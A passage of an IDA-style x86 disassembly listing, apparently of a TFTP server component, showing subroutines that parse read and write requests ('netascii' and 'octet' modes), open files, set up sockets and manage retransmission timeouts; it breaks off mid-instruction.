nullsub_1 jmp short loc_10029B6 ; --------------------------------------------------------------------------- loc_10029A0: ; CODE XREF: sub_100297A+19j push esi call nullsub_1 jmp short loc_10029B6 ; --------------------------------------------------------------------------- loc_10029A8: ; CODE XREF: sub_100297A+16j push esi call sub_1002953 jmp short loc_10029B6 ; --------------------------------------------------------------------------- loc_10029B0: ; CODE XREF: sub_100297A+13j push esi call sub_1002953 loc_10029B6: ; CODE XREF: sub_100297A+7j ; sub_100297A+1Cj ... pop esi retn 4 sub_100297A endp ; =============== S U B R O U T I N E ======================================= sub_10029BA proc near ; DATA XREF: sub_10018DB+98o push ebx mov ebx, ds:dword_1001058 push esi push offset dword_1006080 call ebx ; dword_1001058 mov esi, dword_1006098 cmp esi, offset dword_1006098 jz short loc_1002A28 push edi push ebp loc_10029D9: ; CODE XREF: sub_10029BA+6Aj lea edi, [esi-18h] push edi call ebx ; dword_1001058 mov ebp, [esi] inc dword ptr [edi+10008h] cmp dword ptr [edi+10008h], 4 lea eax, [edi+10008h] push edi jb short loc_1002A16 call ebx ; dword_1001058 mov eax, [esi] mov esi, [esi+4] mov [esi], eax mov [eax+4], esi mov ax, [edi+2Ah] push eax call ds:dword_1001104 push edi call sub_100297A jmp short loc_1002A1C ; --------------------------------------------------------------------------- loc_1002A16: ; CODE XREF: sub_10029BA+3Bj call ds:dword_100104C loc_1002A1C: ; CODE XREF: sub_10029BA+5Aj cmp ebp, offset dword_1006098 mov esi, ebp jnz short loc_10029D9 pop ebp pop edi loc_1002A28: ; CODE XREF: sub_10029BA+1Bj push offset dword_1006080 call ds:dword_100104C call sub_1001A1F pop esi pop ebx retn 8 sub_10029BA endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_1002A3D proc near ; DATA XREF: sub_1002F31+341o ; sub_100333A+32Co var_10 = byte ptr -10h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 10h push ebx push esi push edi push [ebp+arg_0] call sub_10028B5 mov esi, eax xor ebx, ebx cmp esi, ebx jz loc_1002B57 mov eax, [esi+1000Ch] cmp eax, 0Ah jnb loc_1002B0B cmp eax, 5 jbe short loc_1002A8E lea eax, [ebp+var_10] push eax call ds:dword_1001024 mov ax, [esi+2Ah] push eax call ds:dword_100110C mov ax, [esi+3Ah] push eax call ds:dword_1001104 loc_1002A8E: ; CODE XREF: sub_1002A3D+2Fj lea eax, [esi+28h] push 10h push eax push ebx push dword ptr [esi+10020h] lea eax, [esi+38h] push eax push dword ptr [esi+20h] call ds:dword_1001130 cmp eax, 0FFFFFFFFh jnz short loc_1002AB3 call ds:dword_10010F8 loc_1002AB3: ; CODE XREF: sub_1002A3D+6Ej mov edi, [esi+10004h] inc dword ptr [esi+1000Ch] cmp edi, ebx jz loc_1002B4C cmp [esi+10028h], ebx jnz short loc_1002AEA mov eax, [esi+10000h] lea ecx, [esi+10000h] shl eax, 1 mov edx, 2710h mov [ecx], eax cmp eax, edx jbe short loc_1002AEA mov [ecx], edx loc_1002AEA: ; CODE XREF: sub_1002A3D+90j ; sub_1002A3D+A9j mov eax, [esi+10000h] push eax push eax push edi push dword_10060A0 call ds:dword_1001154 cmp eax, ebx jz short loc_1002B4C call ds:dword_1001038 jmp short loc_1002B4C ; --------------------------------------------------------------------------- loc_1002B0B: ; CODE XREF: sub_1002A3D+26j cmp esi, ebx jz short loc_1002B57 push offset aTimeout ; "Timeout" push ebx push dword ptr [esi+20h] lea eax, [esi+28h] push ebx push eax call sub_100230A mov eax, [esi+10004h] lea edi, [esi+10004h] cmp eax, ebx jz short loc_1002B40 push ebx push eax push dword_10060A0 call ds:dword_1001158 loc_1002B40: ; CODE XREF: sub_1002A3D+F3j mov [edi], ebx mov dword ptr [esi+10008h], 4 loc_1002B4C: ; CODE XREF: sub_1002A3D+84j ; sub_1002A3D+C4j ... cmp esi, ebx jz short loc_1002B57 push esi call ds:dword_100104C loc_1002B57: ; CODE XREF: sub_1002A3D+17j ; sub_1002A3D+D0j ... pop edi pop esi pop ebx leave retn 8 sub_1002A3D endp ; =============== S U B R O U T I N E ======================================= sub_1002B5E proc near ; CODE XREF: sub_1002EC8+3Dp var_4 = dword ptr -4 arg_0 = dword ptr 4 arg_4 = dword ptr 8 push ecx push ebx mov ebx, ds:dword_100110C push ebp push esi mov esi, [esp+10h+arg_0] push edi mov edi, [esp+14h+arg_4] xor ebp, ebp mov eax, [esi+10018h] push 4 mov [esp+18h+var_4], ebp mov [edi+20h], eax call ebx ; dword_100110C cmp [edi+34h], ax jnz short loc_1002BA6 mov ax, [esi+10014h] push eax call ebx ; dword_100110C cmp [edi+36h], ax jnz short loc_1002BA6 and dword ptr [esi+1000Ch], 0 push 1 pop ebp jmp short loc_1002BCE ; --------------------------------------------------------------------------- loc_1002BA6: ; CODE XREF: sub_1002B5E+2Aj ; sub_1002B5E+3Aj mov ax, [edi+36h] push eax call ebx ; dword_100110C mov ax, [edi+34h] push eax call ds:dword_1001104 push 4 call ebx ; dword_100110C cmp [edi+34h], ax jnz short loc_1002BCE mov ax, [esi+10014h] dec ax push eax call ebx ; dword_100110C loc_1002BCE: ; CODE XREF: sub_1002B5E+46j ; sub_1002B5E+62j test ebp, ebp jz loc_1002C96 cmp dword ptr [esi+10030h], 0 jz short loc_1002C1C mov eax, [esi+10004h] lea edi, [esi+10004h] test eax, eax jz short loc_1002BFE push 0 push eax push dword_10060A0 call ds:dword_1001158 loc_1002BFE: ; CODE XREF: sub_1002B5E+8Fj and dword ptr [edi], 0 mov dword ptr [esi+10008h], 4 loc_1002C0B: ; CODE XREF: sub_1002B5E+DBj ; sub_1002B5E+13Ej ... push esi call ds:dword_100104C xor eax, eax loc_1002C14: ; CODE XREF: sub_1002B5E+183j pop edi pop esi pop ebp pop ebx pop ecx retn 8 ; --------------------------------------------------------------------------- loc_1002C1C: ; CODE XREF: sub_1002B5E+7Fj inc word ptr [esi+10014h] push edi push esi call sub_10027E1 mov ebp, eax xor eax, eax cmp ebp, eax jnz short loc_1002C3B mov ax, [edi+0Eh] push eax call ebx ; dword_100110C jmp short loc_1002C0B ; --------------------------------------------------------------------------- loc_1002C3B: ; CODE XREF: sub_1002B5E+D2j cmp [esi+10028h], eax mov [esi+1000Ch], eax mov [esi+10008h], eax jnz short loc_1002C59 mov dword ptr [esi+10000h], 3E8h loc_1002C59: ; CODE XREF: sub_1002B5E+EFj mov ecx, [esi+10004h] cmp ecx, eax jz short loc_1002C78 mov eax, [esi+10000h] push eax push eax push ecx push dword_10060A0 call ds:dword_1001154 loc_1002C78: ; CODE XREF: sub_1002B5E+103j mov eax, [esi+1001Ch] cmp eax, [edi+20h] jnb short loc_1002C9A mov ax, [edi+0Eh] push eax call ebx ; dword_100110C mov dword ptr [esi+10030h], 1 jmp short loc_1002C9A ; --------------------------------------------------------------------------- loc_1002C96: ; CODE XREF: sub_1002B5E+72j mov ebp, [esp+14h+var_4] loc_1002C9A: ; CODE XREF: sub_1002B5E+123j ; sub_1002B5E+136j test ebp, ebp jz loc_1002C0B mov ax, [edi+0Eh] push eax call ebx ; dword_100110C add edi, 0Ch push 10h push edi push 0 push dword ptr [esi+10020h] lea eax, [esi+38h] push eax push dword ptr [esi+20h] call ds:dword_1001130 cmp eax, 0FFFFFFFFh jnz loc_1002C0B call ds:dword_10010F8 test esi, esi jz short loc_1002CDE push esi call ds:dword_100104C loc_1002CDE: ; CODE XREF: sub_1002B5E+177j push 1 pop eax jmp loc_1002C14 sub_1002B5E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_1002CE6 proc near ; CODE XREF: sub_1002EC8+34p var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx and [ebp+var_4], 0 push ebx mov ebx, ds:dword_100110C push esi mov esi, [ebp+arg_0] push edi mov edi, [ebp+arg_4] push 3 mov eax, [esi+10018h] mov [edi+20h], eax call ebx ; dword_100110C cmp [edi+34h], ax jnz short loc_1002D3A mov ax, [esi+10014h] inc ax push eax call ebx ; dword_100110C cmp [edi+36h], ax jnz short loc_1002D3A inc word ptr [esi+10014h] xor ebx, ebx mov [ebp+var_4], 1 mov [esi+10008h], ebx jmp short loc_1002D9D ; --------------------------------------------------------------------------- loc_1002D3A: ; CODE XREF: sub_1002CE6+28j ; sub_1002CE6+3Aj push 3 call ebx ; dword_100110C cmp [edi+34h], ax jnz short loc_1002D9B mov ax, [esi+10014h] push eax call ebx ; dword_100110C cmp [edi+36h], ax jnz short loc_1002D9B mov ebx, ds:dword_1001104 push 4 call ebx ; dword_1001104 mov [esi+38h], ax mov ax, [esi+10014h] push eax call ebx ; dword_1001104 add edi, 0Ch push 10h mov [esi+3Ah], ax push edi push 0 lea eax, [esi+38h] push 4 push eax push dword ptr [esi+20h] call ds:dword_1001130 cmp eax, 0FFFFFFFFh jnz loc_1002EB3 call ds:dword_10010F8 jmp loc_1002EB3 ; --------------------------------------------------------------------------- loc_1002D9B: ; CODE XREF: sub_1002CE6+5Cj ; sub_1002CE6+6Cj xor ebx, ebx loc_1002D9D: ; CODE XREF: sub_1002CE6+52j cmp [ebp+var_4], ebx jz short loc_1002DE4 lea eax, [ebp+arg_4] push eax mov eax, [edi+2Ch] push dword ptr [esi+10030h] sub eax, 4 push eax lea eax, [edi+38h] push eax push dword ptr [esi+1002Ch] call sub_100373A cmp [ebp+var_4], ebx mov [ebp+arg_0], eax jz short loc_1002DE4 cmp eax, ebx jge short loc_1002DF7 push ebx push 3 push dword ptr [edi+8] lea eax, [edi+0FFF1h] add edi, 0Ch push eax push edi call sub_100230A loc_1002DE4: ; CODE XREF: sub_1002CE6+BAj ; sub_1002CE6+E2j cmp esi, ebx jz short loc_1002DEF push esi call ds:dword_100104C loc_1002DEF: ; CODE XREF: sub_1002CE6+100j push 1 pop eax jmp loc_1002EBC ; --------------------------------------------------------------------------- loc_1002DF7: ; CODE XREF: sub_1002CE6+E6j mov eax, [edi+2Ch] sub eax, 4 cmp eax, [edi+20h] ja loc_1002EB3 mov ebx, ds:dword_1001104 push 4 call ebx ; dword_1001104 mov [esi+38h], ax mov ax, [esi+10014h] push eax call ebx ; dword_1001104 mov [esi+3Ah], ax lea eax, [edi+0Ch] push 10h xor ebx, ebx push eax push ebx lea eax, [esi+38h] push 4 push eax push dword ptr [esi+20h] call ds:dword_1001130 mov [ebp+arg_0], eax mov eax, [esi+10004h] cmp eax, ebx jz short loc_1002E74 cmp [esi+10028h], ebx mov [esi+1000Ch], ebx jnz short loc_1002E5F mov dword ptr [esi+10000h], 3E8h loc_1002E5F: ; CODE XREF: sub_1002CE6+16Dj mov ecx, [esi+10000h] push ecx push ecx push eax push dword_10060A0 call ds:dword_1001154 loc_1002E74: ; CODE XREF: sub_1002CE6+15Fj cmp [ebp+arg_0], 0FFFFFFFFh jnz short loc_1002E80 call ds:dword_10010F8 loc_1002E80: ; CODE XREF: sub_1002CE6+192j mov eax, [edi+2Ch] sub eax, 4 cmp eax, [edi+20h] jnb short loc_1002EB3 mov eax, [esi+10004h] cmp eax, ebx jz short loc_1002EA3 push ebx push eax push dword_10060A0 call ds:dword_1001158 loc_1002EA3: ; CODE XREF: sub_1002CE6+1ADj mov [esi+10004h], ebx mov dword ptr [esi+10008h], 4 loc_1002EB3: ; CODE XREF: sub_1002CE6+A4j ; sub_1002CE6+B0j ... push esi call ds:dword_100104C xor eax, eax loc_1002EBC: ; CODE XREF: sub_1002CE6+10Cj pop edi pop esi pop ebx leave retn 8 sub_1002CE6 endp ; =============== S U B R O U T I N E ======================================= sub_1002EC3 proc near ; CODE XREF: sub_1002EC8+22p ; sub_1002EC8+2Bp xor eax, eax retn 8 sub_1002EC3 endp ; =============== S U B R O U T I N E ======================================= sub_1002EC8 proc near ; CODE XREF: sub_1001A91+254p arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push dword ptr [esi+8] call sub_10028B5 test eax, eax jz short loc_1002F0A mov ecx, [eax+24h] dec ecx jz short loc_1002F03 dec ecx jz short loc_1002EFA dec ecx jz short loc_1002EF1 dec ecx jnz short loc_1002F0A push esi push eax call sub_1002EC3 jmp short loc_1002F0A ; --------------------------------------------------------------------------- loc_1002EF1: ; CODE XREF: sub_1002EC8+1Bj push esi push eax call sub_1002EC3 jmp short loc_1002F0A ; --------------------------------------------------------------------------- loc_1002EFA: ; CODE XREF: sub_1002EC8+18j push esi push eax call sub_1002CE6 jmp short loc_1002F0A ; --------------------------------------------------------------------------- loc_1002F03: ; CODE XREF: sub_1002EC8+15j push esi push eax call sub_1002B5E loc_1002F0A: ; CODE XREF: sub_1002EC8+Fj ; sub_1002EC8+1Ej ... pop esi retn 4 sub_1002EC8 endp ; =============== S U B R O U T I N E ======================================= sub_1002F0E proc near ; CODE XREF: sub_1002F31+20p ; sub_100333A+41p arg_0 = dword ptr 4 arg_4 = dword ptr 8 xor eax, eax cmp [esp+arg_4], eax jbe short loc_1002F27 loc_1002F16: ; CODE XREF: sub_1002F0E+17j mov ecx, [esp+arg_0] cmp byte ptr [eax+ecx], 0 jz short loc_1002F2C inc eax cmp eax, [esp+arg_4] jb short loc_1002F16 loc_1002F27: ; CODE XREF: sub_1002F0E+6j xor eax, eax locret_1002F29: ; CODE XREF: sub_1002F0E+21j retn 8 ; --------------------------------------------------------------------------- loc_1002F2C: ; CODE XREF: sub_1002F0E+10j push 1 pop eax jmp short locret_1002F29 sub_1002F0E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_1002F31 proc near ; CODE XREF: sub_1001A91+223p ; DATA XREF: sub_1001A91+1FCo var_28 = word ptr -28h var_26 = word ptr -26h var_24 = dword ptr -24h var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 28h push ebx and [ebp+var_10], 0 and [ebp+var_14], 0 push esi mov esi, [ebp+arg_0] push edi push 0FFBAh lea ebx, [esi+36h] push ebx mov [ebp+var_18], ebx call sub_1002F0E test eax, eax jz loc_100330F mov edi, ebx or ecx, 0FFFFFFFFh xor eax, eax push 10034h repne scasb not ecx dec ecx lea eax, [ecx+ebx+1] mov [ebp+var_4], eax call ds:dword_1001094 mov ebx, eax pop ecx test ebx, ebx jz loc_1003331 mov ecx, 400Dh xor eax, eax mov edi, ebx rep stosd push dword ptr [esi+10h] call ds:dword_1001120 mov [ebp+var_8], eax mov ax, [esi+0Eh] push eax call ds:dword_1001104 mov edi, [ebp+var_4] mov [ebp+var_C], edi mov al, [edi] test al, al jz short loc_1002FCD loc_1002FB5: ; CODE XREF: sub_1002F31+97j movsx eax, al push eax call ds:dword_1001150 mov [edi], al mov al, [edi+1] inc edi pop ecx test al, al jnz short loc_1002FB5 mov [ebp+var_C], edi loc_1002FCD: ; CODE XREF: sub_1002F31+82j mov edi, [ebp+var_4] mov eax, offset aNetascii ; "netascii" loc_1002FD5: ; CODE XREF: sub_1002F31+C0j mov dl, [edi] mov cl, dl cmp dl, [eax] jnz short loc_1002FF7 test cl, cl jz short loc_1002FF3 mov dl, [edi+1] mov cl, dl cmp dl, [eax+1] jnz short loc_1002FF7 inc edi inc edi inc eax inc eax test cl, cl jnz short loc_1002FD5 loc_1002FF3: ; CODE XREF: sub_1002F31+AEj xor eax, eax jmp short loc_1002FFC ; --------------------------------------------------------------------------- loc_1002FF7: ; CODE XREF: sub_1002F31+AAj ; sub_1002F31+B8j sbb eax, eax sbb eax, 0FFFFFFFFh loc_1002FFC: ; CODE XREF: sub_1002F31+C4j test eax, eax jz short loc_1003037 mov edi, [ebp+var_4] mov eax, offset aOctet ; "octet" loc_1003008: ; CODE XREF: sub_1002F31+F3j mov dl, [edi] mov cl, dl cmp dl, [eax] jnz short loc_100302A test cl, cl jz short loc_1003026 mov dl, [edi+1] mov cl, dl cmp dl, [eax+1] jnz short loc_100302A inc edi inc edi inc eax inc eax test cl, cl jnz short loc_1003008 loc_1003026: ; CODE XREF: sub_1002F31+E1j xor eax, eax jmp short loc_100302F ; --------------------------------------------------------------------------- loc_100302A: ; CODE XREF: sub_1002F31+DDj ; sub_1002F31+EBj sbb eax, eax sbb eax, 0FFFFFFFFh loc_100302F: ; CODE XREF: sub_1002F31+F7j test eax, eax jnz loc_10032F6 loc_1003037: ; CODE XREF: sub_1002F31+CDj mov edi, [ebp+var_18] or ecx, 0FFFFFFFFh xor eax, eax lea edx, [esi+1FFADh] repne scasb not ecx sub edi, ecx push edx mov eax, ecx mov esi, edi mov edi, edx mov [ebp+var_4], edx shr ecx, 2 rep movsd mov ecx, eax and ecx, 3 rep movsb call sub_100261E test eax, eax jnz short loc_1003071 push offset aMalformedFileN ; "Malformed file name" jmp short loc_10030CB ; --------------------------------------------------------------------------- loc_1003071: ; CODE XREF: sub_1002F31+137j push [ebp+var_8] push offset dword_1005CE8 call sub_10039D6 test eax, eax jnz short loc_1003093 push [ebp+var_8] push offset dword_1005D20 call sub_10039D6 test eax, eax jz short loc_10030A4 loc_1003093: ; CODE XREF: sub_1002F31+14Fj push [ebp+var_4] push offset dword_1005D58 call sub_10039D6 test eax, eax jnz short loc_10030B0 loc_10030A4: ; CODE XREF: sub_1002F31+160j call ds:dword_10010AC push 0 push 2 jmp short loc_1003100 ; --------------------------------------------------------------------------- loc_10030B0: ; CODE XREF: sub_1002F31+171j push (offset dword_1005E07+1) push 0FFBCh push [ebp+var_4] call sub_100273D test eax, eax jnz short loc_10030CF push offset aFileNameTooLon ; "File name too long" loc_10030CB: ; CODE XREF: sub_1002F31+13Ej push 0 jmp short loc_1003100 ; --------------------------------------------------------------------------- loc_10030CF: ; CODE XREF: sub_1002F31+193j push 8000h push [ebp+var_4] call ds:dword_10010E4 pop ecx cmp eax, 0FFFFFFFFh pop ecx mov [ebx+1002Ch], eax jnz short loc_1003116 mov esi, ds:dword_10010AC call esi ; dword_10010AC push dword ptr [eax] call ds:dword_100102C call esi ; dword_10010AC push 0 push 1 loc_1003100: ; CODE XREF: sub_1002F31+17Dj ; sub_1002F31+19Cj mov eax, [ebp+arg_0] push dword ptr [eax+8] lea ecx, [eax+0FFF1h] add eax, 0Ch push ecx push eax jmp loc_1003308 ; --------------------------------------------------------------------------- loc_1003116: ; CODE XREF: sub_1002F31+1B7j mov edi, ds:dword_1001088 push 2 push 0 push eax call edi ; dword_1001088 mov esi, [ebp+arg_0] add esp, 0Ch cmp eax, 0FFFFFFFFh jz short loc_1003140 push 0 push 0 mov [esi+24h], eax push dword ptr [ebx+1002Ch] call edi ; dword_1001088 add esp, 0Ch loc_1003140: ; CODE XREF: sub_1002F31+1FBj cmp eax, 0FFFFFFFFh jnz short loc_1003159 mov edi, ds:dword_10010AC call edi ; dword_10010AC call edi ; dword_10010AC push dword ptr [eax] call ds:dword_100102C jmp short loc_1003197 ; --------------------------------------------------------------------------- loc_1003159: ; CODE XREF: sub_1002F31+212j push 0 push 2 push 2 call ds:dword_100112C mov edi, eax cmp edi, 0FFFFFFFFh mov [ebp+var_4], edi jz short loc_1003191 mov eax, [esi+1Ch] and [ebp+var_26], 0 mov [ebp+var_24], eax lea eax, [ebp+var_28] push 10h push eax push edi mov [ebp+var_28], 2 call ds:dword_1001124 test eax, eax jz short loc_10031A3 loc_1003191: ; CODE XREF: sub_1002F31+23Cj call ds:dword_10010F8 loc_1003197: ; CODE XREF: sub_1002F31+226j push offset aInsufficientRe ; "Insufficient resources" push 0 jmp loc_10032FA ; --------------------------------------------------------------------------- loc_10031A3: ; CODE XREF: sub_1002F31+25Ej push ebx mov [esi+8], edi call ds:dword_1001044 mov [ebx+20h], edi add esi, 0Ch lea edi, [ebx+28h] mov [ebp+var_8], esi movsd movsd movsd movsd xor edi, edi push edi push edi push edi push edi call ds:dword_1001040 cmp eax, edi mov [ebx+0FFF8h], eax jz short loc_10031E8 push 2 push eax push [ebp+var_4] call sub_100188E cmp eax, edi mov [ebx+0FFFCh], eax jnz short loc_10031F3 loc_10031E8: ; CODE XREF: sub_1002F31+2A0j call ds:dword_1001038 jmp loc_1003312 ; --------------------------------------------------------------------------- loc_10031F3: ; CODE XREF: sub_1002F31+2B5j add ebx, 18h push ebx call sub_100287F push 1 pop esi push [ebp+var_4] mov [ebp+var_14], esi call sub_10028B5 mov ebx, eax cmp ebx, edi jz loc_1003312 lea edi, [ebx+10028h] lea eax, [ebx+38h] push edi push eax lea eax, [ebx+10024h] mov [ebp+var_10], esi push eax mov eax, [ebp+var_C] push esi mov esi, [ebp+arg_0] inc eax push eax push esi call sub_10023D8 test eax, eax jnz loc_1003312 cmp [edi], eax jz short loc_1003255 mov eax, [esi+28h] imul eax, 3E8h mov [ebx+10000h], eax jmp short loc_100325F ; --------------------------------------------------------------------------- loc_1003255: ; CODE XREF: sub_1002F31+311j mov dword ptr [ebx+10000h], 3E8h loc_100325F: ; CODE XREF: sub_1002F31+322j mov eax, [ebx+10000h] push 0 push eax push eax push dword ptr [ebx+20h] lea eax, [ebx+10004h] push offset sub_1002A3D push eax push dword_10060A0 call ds:dword_1001178 push 1 pop edi mov [ebx+24h], edi mov eax, [esi+20h] push esi push ebx mov [ebx+10018h], eax mov [ebx+10014h], di call sub_10027E1 push 10h xor ecx, ecx push [ebp+var_8] cmp eax, ecx mov [ebx+1000Ch], ecx push ecx push dword ptr [ebx+10020h] jz short loc_10032D9 lea eax, [ebx+38h] push eax push [ebp+var_4] call ds:dword_1001130 mov ecx, [ebx+1001Ch] cmp ecx, [esi+20h] jnb short loc_10032E9 mov [ebx+10030h], edi jmp short loc_10032E9 ; --------------------------------------------------------------------------- loc_10032D9: ; CODE XREF: sub_1002F31+386j add esi, 0FFF1h push esi push [ebp+var_4] call ds:dword_1001130 loc_10032E9: ; CODE XREF: sub_1002F31+39Ej ; sub_1002F31+3A6j cmp eax, 0FFFFFFFFh jnz short loc_1003312 call ds:dword_10010F8 jmp short loc_1003312 ; --------------------------------------------------------------------------- loc_10032F6: ; CODE XREF: sub_1002F31+100j push 0 push 4 loc_10032FA: ; CODE XREF: sub_1002F31+26Dj push dword ptr [esi+8] lea eax, [esi+0FFF1h] add esi, 0Ch push eax push esi loc_1003308: ; CODE XREF: sub_1002F31+1E0j call sub_100230A jmp short loc_1003312 ; --------------------------------------------------------------------------- loc_100330F: ; CODE XREF: sub_1002F31+27j mov ebx, [ebp+arg_0] loc_1003312: ; CODE XREF: sub_1002F31+2BDj ; sub_1002F31+2DDj ... test ebx, ebx jz short loc_1003331 cmp [ebp+var_10], 0 jz short loc_1003323 push ebx call ds:dword_100104C loc_1003323: ; CODE XREF: sub_1002F31+3E9j cmp [ebp+var_14], 0 jnz short loc_1003331 push ebx call ds:dword_10010A0 pop ecx loc_1003331: ; CODE XREF: sub_1002F31+50j ; sub_1002F31+3E3j ... pop edi pop esi xor eax, eax pop ebx leave retn 4 sub_1002F31 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_100333A proc near ; DATA XREF: sub_1001A91+20Fo var_28 = word ptr -28h var_26 = word ptr -26h var_24 = dword ptr -24h var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 28h and [ebp+var_10], 0 and [ebp+var_14], 0 push ebx push esi push edi push 10034h call ds:dword_1001094 mov ebx, eax pop ecx test ebx, ebx jz loc_1003731 mov ecx, 400Dh xor eax, eax mov edi, ebx push 0FFBAh rep stosd mov eax, [ebp+arg_0] lea esi, [eax+36h] push esi mov [ebp+var_4], esi call sub_1002F0E test eax, eax jz loc_1003712 mov edi, esi or ecx, 0FFFFFFFFh xor eax, eax repne scasb mov edi, [ebp+arg_0] not ecx push dword ptr [edi+10h] dec ecx lea esi, [ecx+esi+1] call ds:dword_1001120 mov [ebp+var_18], eax mov ax, [edi+0Eh] push eax call ds:dword_1001104 cmp byte ptr [esi], 0 mov edi, esi mov [ebp+var_C], edi jz short loc_10033E1 loc_10033BC: ; CODE XREF: sub_100333A+A2j movsx eax, byte ptr [edi] push eax call ds:dword_100114C test eax, eax movsx eax, byte ptr [edi] pop ecx jz short loc_10033D6 push eax call ds:dword_1001150 pop ecx loc_10033D6: ; CODE XREF: sub_100333A+92j mov [edi], al inc edi cmp byte ptr [edi], 0 jnz short loc_10033BC mov [ebp+var_C], edi loc_10033E1: ; CODE XREF: sub_100333A+80j mov eax, offset aNetascii ; "netascii" mov edi, esi loc_10033E8: ; CODE XREF: sub_100333A+CAj mov dl, [edi] mov cl, dl cmp dl, [eax] jnz short loc_100340A test cl, cl jz short loc_1003406 mov dl, [edi+1] mov cl, dl cmp dl, [eax+1] jnz short loc_100340A inc edi inc edi inc eax inc eax test cl, cl jnz short loc_10033E8 loc_1003406: ; CODE XREF: sub_100333A+B8j xor eax, eax jmp short loc_100340F ; --------------------------------------------------------------------------- loc_100340A: ; CODE XREF: sub_100333A+B4j ; sub_100333A+C2j sbb eax, eax sbb eax, 0FFFFFFFFh loc_100340F: ; CODE XREF: sub_100333A+CEj test eax, eax jnz short loc_100341F mov dword ptr [ebx+10030h], 4000h jmp short loc_100345D ; --------------------------------------------------------------------------- loc_100341F: ; CODE XREF: sub_100333A+D7j mov edi, offset aOctet ; "octet" loc_1003424: ; CODE XREF: sub_100333A+106j mov cl, [esi] mov al, cl cmp cl, [edi] jnz short loc_1003446 test al, al jz short loc_1003442 mov cl, [esi+1] mov al, cl cmp cl, [edi+1] jnz short loc_1003446 inc esi inc esi inc edi inc edi test al, al jnz short loc_1003424 loc_1003442: ; CODE XREF: sub_100333A+F4j xor eax, eax jmp short loc_100344B ; --------------------------------------------------------------------------- loc_1003446: ; CODE XREF: sub_100333A+F0j ; sub_100333A+FEj sbb eax, eax sbb eax, 0FFFFFFFFh loc_100344B: ; CODE XREF: sub_100333A+10Aj test eax, eax jnz loc_10036F8 mov dword ptr [ebx+10030h], 8000h loc_100345D: ; CODE XREF: sub_100333A+E3j mov eax, [ebp+arg_0] mov edi, [ebp+var_4] or ecx, 0FFFFFFFFh lea edx, [eax+1FFADh] xor eax, eax repne scasb not ecx sub edi, ecx push edx mov eax, ecx mov esi, edi mov edi, edx mov [ebp+var_8], edx shr ecx, 2 rep movsd mov ecx, eax and ecx, 3 rep movsb call sub_100261E test eax, eax jnz short loc_100349A push offset aMalformedFileN ; "Malformed file name" jmp short loc_10034DF ; --------------------------------------------------------------------------- loc_100349A: ; CODE XREF: sub_100333A+157j push [ebp+var_18] push offset dword_1005D20 call sub_10039D6 test eax, eax jz loc_10036EC push [ebp+var_4] push offset dword_1005D90 call sub_10039D6 test eax, eax jz loc_10036EC push (offset dword_1005E07+1) push 0FFBCh push [ebp+var_8] call sub_100273D test eax, eax jnz short loc_10034E6 push offset aFileNameTooLon ; "File name too long" loc_10034DF: ; CODE XREF: sub_100333A+15Ej push 0 jmp loc_10036FC ; --------------------------------------------------------------------------- loc_10034E6: ; CODE XREF: sub_100333A+19Ej push 180h push 8302h push [ebp+var_8] call ds:dword_10010E4 add esp, 0Ch cmp eax, 0FFFFFFFFh mov [ebx+1002Ch], eax jnz short loc_100351E mov esi, ds:dword_10010AC call esi ; dword_10010AC call esi ; dword_10010AC push dword ptr [eax] call ds:dword_100102C jmp loc_10036F2 ; --------------------------------------------------------------------------- loc_100351E: ; CODE XREF: sub_100333A+1CBj xor esi, esi push esi push 2 push 2 call ds:dword_100112C mov edi, eax cmp edi, 0FFFFFFFFh mov [ebp+var_4], edi jnz short loc_1003546 call ds:dword_10010F8 push offset aInsufficientRe ; "Insufficient resources" push esi jmp loc_10036FC ; --------------------------------------------------------------------------- loc_1003546: ; CODE XREF: sub_100333A+1F9j mov [ebp+var_26], si mov esi, [ebp+arg_0] push 10h mov [ebp+var_28], 2 mov eax, [esi+1Ch] mov [ebp+var_24], eax lea eax, [ebp+var_28] push eax push edi call ds:dword_1001124 test eax, eax jz short loc_100358A call ds:dword_10010F8 push offset aInsufficientRe ; "Insufficient resources" push 0 push dword ptr [esi+8] lea eax, [esi+0FFF1h] add esi, 0Ch push eax push esi jmp loc_100370D ; --------------------------------------------------------------------------- loc_100358A: ; CODE XREF: sub_100333A+22Ej lea eax, [ebx+10028h] mov [esi+8], edi push eax lea eax, [ebx+38h] push eax lea eax, [ebx+10024h] push eax mov eax, [ebp+var_C] inc eax push 2 push eax push esi call sub_10023D8 test eax, eax jnz loc_1003712 push ebx call ds:dword_1001044 mov [ebx+20h], edi add esi, 0Ch lea edi, [ebx+28h] mov [ebp+var_18], esi movsd movsd movsd movsd xor esi, esi push esi push esi push esi push esi call ds:dword_1001040 cmp eax, esi mov [ebx+0FFF8h], eax jz short loc_10035F8 push 2 pop edi push edi push eax push [ebp+var_4] call sub_100188E cmp eax, esi mov [ebx+0FFFCh], eax jnz short loc_1003603 loc_10035F8: ; CODE XREF: sub_100333A+2A5j call ds:dword_1001038 jmp loc_1003712 ; --------------------------------------------------------------------------- loc_1003603: ; CODE XREF: sub_100333A+2BCj add ebx, 18h push ebx call sub_100287F push [ebp+var_4] mov [ebp+var_14], 1 call sub_10028B5 mov ebx, eax cmp ebx, esi jz loc_1003712 xor esi, esi mov [ebp+var_10], 1 cmp [ebx+10028h], esi jz short loc_100364A mov eax, [ebp+arg_0] mov eax, [eax+28h] imul eax, 3E8h mov [ebx+10000h], eax jmp short loc_1003654 ; --------------------------------------------------------------------------- loc_100364A: ; CODE XREF: sub_100333A+2FAj mov dword ptr [ebx+10000h], 3E8h loc_1003654: ; CODE XREF: sub_100333A+30Ej mov eax, [ebx+10000h] push esi push eax push eax push dword ptr [ebx+20h] lea eax, [ebx+10004h] push offset 